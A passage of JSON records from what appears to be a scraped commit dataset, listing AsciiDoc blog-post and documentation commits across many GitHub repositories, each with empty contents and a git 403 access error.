2016-01-12-Testing-blogging-with-Syntax-Highlighting.adoc","repos":"kim0\/hubpress.io,kim0\/hubpress.io,kim0\/hubpress.io","old_file":"_posts\/2016-01-12-Testing-blogging-with-Syntax-Highlighting.adoc","new_file":"_posts\/2016-01-12-Testing-blogging-with-Syntax-Highlighting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kim0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b09cb06ee15d6c389872b62a648def35887da245","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a59ded95c8e32ac927fb51b20e3d2ac69bf6e36","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28fd23c10706fdcee900ebcd77a2d994abccfb27","subject":"Fix layout","message":"Fix layout\n","repos":"zsoltii\/dss,openlimit-signcubes\/dss,alisdev\/dss,esig\/dss,zsoltii\/dss,esig\/dss,openlimit-signcubes\/dss,alisdev\/dss","old_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alisdev\/dss.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"96f7c30b42fb70194f2253505659d86e4107e2fb","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bd330387cd54116ccf0dfb11906873fc89bb0bb","subject":"Update 2015-07-18-How-do-you-say-it.adoc","message":"Update 2015-07-18-How-do-you-say-it.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-18-How-do-you-say-it.adoc","new_file":"_posts\/2015-07-18-How-do-you-say-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47875e702f8465df1dd22cd0881ad1055a07762d","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47c7da439848476d3b33864b82852c9d52be4634","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eab95670533d46d05a0ae90ea8827bdd44b4e938","subject":"Update 2016-03-31-Descuidos-fatales.adoc","message":"Update 2016-03-31-Descuidos-fatales.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f67d6a1cdde3769dfa5c9cc7f4116c83a1545b91","subject":"Update 2018-03-06-Creating-a-custom-select-element.adoc","message":"Update 2018-03-06-Creating-a-custom-select-element.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a92879e77fa135d5d283badf6eb13ff05ab67fb2","subject":"unix slash","message":"unix slash\n","repos":"lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/quick-start.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/quick-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3f7a635545ba1b092c7639be6033a0845d144019","subject":"Update 2015-06-11-Fireworks.adoc","message":"Update 2015-06-11-Fireworks.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-11-Fireworks.adoc","new_file":"_posts\/2015-06-11-Fireworks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad142868ee0786184dfb8884af16ec8e137d4b5b","subject":"Update 2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","message":"Update 2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","new_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb7331030b7b5a7847f4b22462263717b4f8a3f9","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c602a314400b839c41b2e0bcd6d4663f69453cf","subject":"Update 2016-04-15-Introduccion-a-Ruby.adoc","message":"Update 2016-04-15-Introduccion-a-Ruby.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5b8437b7b786634f80ca8b065ef7594daa450d9","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a2f23d1f82cc70977ff7424e23eb8ca6971af9b","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"664f02e1bc956628acd7022e6e73aa58ad3e5ae5","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bb07f3335b2b19fd70fbc218613c4e842218ad6","subject":"Update 2016-11-08-Mechine-Learning-explained-to-my-girlfriend.adoc","message":"Update 2016-11-08-Mechine-Learning-explained-to-my-girlfriend.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2016-11-08-Mechine-Learning-explained-to-my-girlfriend.adoc","new_file":"_posts\/2016-11-08-Mechine-Learning-explained-to-my-girlfriend.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aed29740ddd56f0ff370c9aa8b20fcd1d2dcb08d","subject":"y2b create post 64 chances to win a new TV!?!","message":"y2b create post 64 chances to win a new TV!?!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-18-64-chances-to-win-a-new-TV.adoc","new_file":"_posts\/2013-03-18-64-chances-to-win-a-new-TV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c5c4fd594421e777c73f30851dfcc76f8d78773","subject":"Update 2016-04-16-Lorem-ipsum-dolor-sit-amet.adoc","message":"Update 2016-04-16-Lorem-ipsum-dolor-sit-amet.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-16-Lorem-ipsum-dolor-sit-amet.adoc","new_file":"_posts\/2016-04-16-Lorem-ipsum-dolor-sit-amet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd2282dbac6b93a1ebe232824cdabe8fe14c8b59","subject":"y2b create post Apple AirPods - Does It Suck?","message":"y2b create post Apple AirPods - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-11-Apple-AirPods--Does-It-Suck.adoc","new_file":"_posts\/2017-01-11-Apple-AirPods--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fd93d5af75e85a0be60e4b24ea1d42d09596857","subject":"Update 2017-03-17-Goodbye-Flask-hello-aiohttp.adoc","message":"Update 2017-03-17-Goodbye-Flask-hello-aiohttp.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2017-03-17-Goodbye-Flask-hello-aiohttp.adoc","new_file":"_posts\/2017-03-17-Goodbye-Flask-hello-aiohttp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c66e1ffae9b706fb991bb62e8033a44f68d1f199","subject":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","message":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12371fae47d26502f3dd5ad0bd809c5eab99f185","subject":"Update 2016-12-31-Chocolate-Nice-Cream-Chia-Pudding-Breakfast.adoc","message":"Update 2016-12-31-Chocolate-Nice-Cream-Chia-Pudding-Breakfast.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-12-31-Chocolate-Nice-Cream-Chia-Pudding-Breakfast.adoc","new_file":"_posts\/2016-12-31-Chocolate-Nice-Cream-Chia-Pudding-Breakfast.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"683228aaa49fd61909ecd6ae8e4b44586f4f59b5","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5602681cd996f399df3fb478f6a224ce8f179fa","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"039155065dc0996a73af21d0d8af02fc286b0d1e","subject":"Update 2016-02-17-Mickeys-Soundsational-Parade-Live-Stream-Event.adoc","message":"Update 2016-02-17-Mickeys-Soundsational-Parade-Live-Stream-Event.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-17-Mickeys-Soundsational-Parade-Live-Stream-Event.adoc","new_file":"_posts\/2016-02-17-Mickeys-Soundsational-Parade-Live-Stream-Event.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"450c5d7cdf8db631a7d434d169b21c26c5ddc9e2","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebcddbbe748b953c8afdb6c25423b08ae6ff162f","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9736cdd15fbc933e30aa47664a0621177673a18e","subject":"Update 2015-10-25-Middleman.adoc","message":"Update 2015-10-25-Middleman.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Middleman.adoc","new_file":"_posts\/2015-10-25-Middleman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fbfc0d3a15508881db0a3da249d7ff6d83d0632","subject":"added docs","message":"added docs\n","repos":"puddingspudding\/scrum-poker,puddingspudding\/scrum-poker","old_file":"index.adoc","new_file":"index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puddingspudding\/scrum-poker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b91f7f9089e7d88442fde4123f2e71ab1aaf0ee","subject":"Update 2011-05-17-The-Rationale-for-Testing.adoc","message":"Update 2011-05-17-The-Rationale-for-Testing.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2011-05-17-The-Rationale-for-Testing.adoc","new_file":"_posts\/2011-05-17-The-Rationale-for-Testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea3596a9314bf5a045aa898f55878d9cc19545db","subject":"Update 2017-01-26-Updating-the-blog-version.adoc","message":"Update 2017-01-26-Updating-the-blog-version.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-01-26-Updating-the-blog-version.adoc","new_file":"_posts\/2017-01-26-Updating-the-blog-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23e1cec22833889633199901366f8edbe79c301c","subject":"Update 2015-03-27-Road-to-the-OCR-World-Cup.adoc","message":"Update 2015-03-27-Road-to-the-OCR-World-Cup.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-27-Road-to-the-OCR-World-Cup.adoc","new_file":"_posts\/2015-03-27-Road-to-the-OCR-World-Cup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33b25e3def99ad6e9a8cc86769147b0fd241c6d1","subject":"Update 2017-08-02-Network-Information-A-P-I.adoc","message":"Update 2017-08-02-Network-Information-A-P-I.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-08-02-Network-Information-A-P-I.adoc","new_file":"_posts\/2017-08-02-Network-Information-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd5c0a226d95e0cd8daf3cd09d070cb69a4b9ae4","subject":"Create 2017-04-03-forge-3.6.1.final.asciidoc","message":"Create 2017-04-03-forge-3.6.1.final.asciidoc","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-04-03-forge-3.6.1.final.asciidoc","new_file":"news\/2017-04-03-forge-3.6.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"bc2dab2d82a0ac3201dde6567d04b6dc0700c205","subject":"y2b create post The iPhone Spy Camera","message":"y2b create post The iPhone Spy Camera","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-14-The-iPhone-Spy-Camera.adoc","new_file":"_posts\/2016-04-14-The-iPhone-Spy-Camera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5be714b3856a4e8617e99b5e049fd8ff910b005c","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f839ed54ab887aa17eb3803ffc80dd43ea9150c9","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9ca197a4ccc7d97ac8b00bb624e19f2fe29f2b6","subject":"Change gorm version","message":"Change gorm version","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/commonChangeGormVersion.adoc","new_file":"src\/main\/docs\/commonChangeGormVersion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67af213b5dc80c5a291d07f5d65af5dd954b6cf0","subject":"add a readme to pushover channel","message":"add a readme to pushover channel\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"channels\/boteco-channel-pushover\/README.adoc","new_file":"channels\/boteco-channel-pushover\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4453804eaf3e46fcf564a2bc01a579e3dbdb07e0","subject":"Update 2017-03-15-What-Init-system-am-I-using.adoc","message":"Update 2017-03-15-What-Init-system-am-I-using.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-15-What-Init-system-am-I-using.adoc","new_file":"_posts\/2017-03-15-What-Init-system-am-I-using.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17d1d56a326debf3cd2d4d0844ef4c30f9e82f3b","subject":"Add files via upload","message":"Add files via upload\n\nCreated aws-multitier, copy of aws-single-ami","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws-multitier.adoc","new_file":"userguide\/tutorials\/aws-multitier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f5ac4f26e7c3757b2c18fab0ffbd593da25f767","subject":"y2b create post PlayStation 3 Blu-ray Remote 2.0 Unboxing (2011)","message":"y2b create post PlayStation 3 Blu-ray Remote 2.0 Unboxing 